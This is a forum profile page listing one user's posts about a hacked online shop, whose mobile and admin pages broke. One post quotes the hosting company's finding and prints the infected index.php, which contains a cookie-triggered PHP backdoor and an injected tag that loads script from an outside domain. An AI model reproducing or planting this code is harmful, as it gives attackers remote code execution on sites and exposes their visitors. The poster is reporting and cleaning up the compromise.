Jump to content

 

joshin

Member Since 23 Jan 2008
Offline Last Active Sep 07 2016 05:56 PM
-----

Posts I've Made

In Topic: Bootstrap.php Issue

05 September 2016 - 06:22 AM

Thank you guys for your assistance! Not sure how I was hacked....brute force on my password?  I have my entire site backed up recently, so we reinstalled that copy and everything seems to work now, including my mobile version of the site. I'll change all passwords and see what I can do about finding the intrusion.


In Topic: Bootstrap.php Issue

02 September 2016 - 05:48 PM

I just got this message from my hosting company:

 

The index.php has:

<?php

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);


/***************************************************************************
* *
* © 2004 Vladimir V. Kalynyak, Alexey V. Vinokurov, Ilya M. Shalnev *
* *
* This is commercial software, only users who have purchased a valid *
* license and accept to the terms of the License Agreement can install *
* and use this program. *
* *
****************************************************************************
* PLEASE READ THE FULL TEXT OF THE SOFTWARE LICENSE AGREEMENT IN THE *
* "copyright.txt" FILE PROVIDED WITH THIS DISTRIBUTION PACKAGE. *
****************************************************************************/

$php_value = phpversion();
if (version_compare($php_value, '5.3.6') == -1) {
echo 'Currently installed PHP version (' . $php_value . ') is not supported. Minimal required PHP version is 5.3.6.';
die();
}

define('AREA', 'C');

try {
require(dirname(__FILE__) . '/init.php');
fn_dispatch();
} catch (Tygh\Exceptions\AException $e) {
$e->output();
}

#3a8987#
if(empty($huk)) {
$huk = "<script type=\"text/javascript\" src=\"http://scob.fr/2mdb3...9\"></script>";
echo $huk;
}
#/3a8987#


it is likely the site is compromised and should be restored from backups."


In Topic: Bootstrap.php Issue

02 September 2016 - 05:41 PM

Yes, I'm using Twigmo...maybe I need to update this or something?  By "mobile site is still not working now," I mean my mobile site is not loading on any devices. 

 

Also, I just realized my admin page is not loading. My site is a hot mess!


In Topic: Bootstrap.php Issue

02 September 2016 - 01:09 AM

Hi guys, thanks for your input!

 

I also asked my hosting company to look into it.

 

They said this did this:

 

"I have set in php.ini

output_buffering = On

to allow headers to be sent twice."

 

This actually got rid of that warning across the top of my site, however, my mobile site is still not working now.  Could this be a separate issue?  I haven't made any recent changes to my site other than clear out the cache in var.


In Topic: Bootstrap.php Issue

31 August 2016 - 10:04 PM

It also seems my mobile site isn't working since this occurred :? .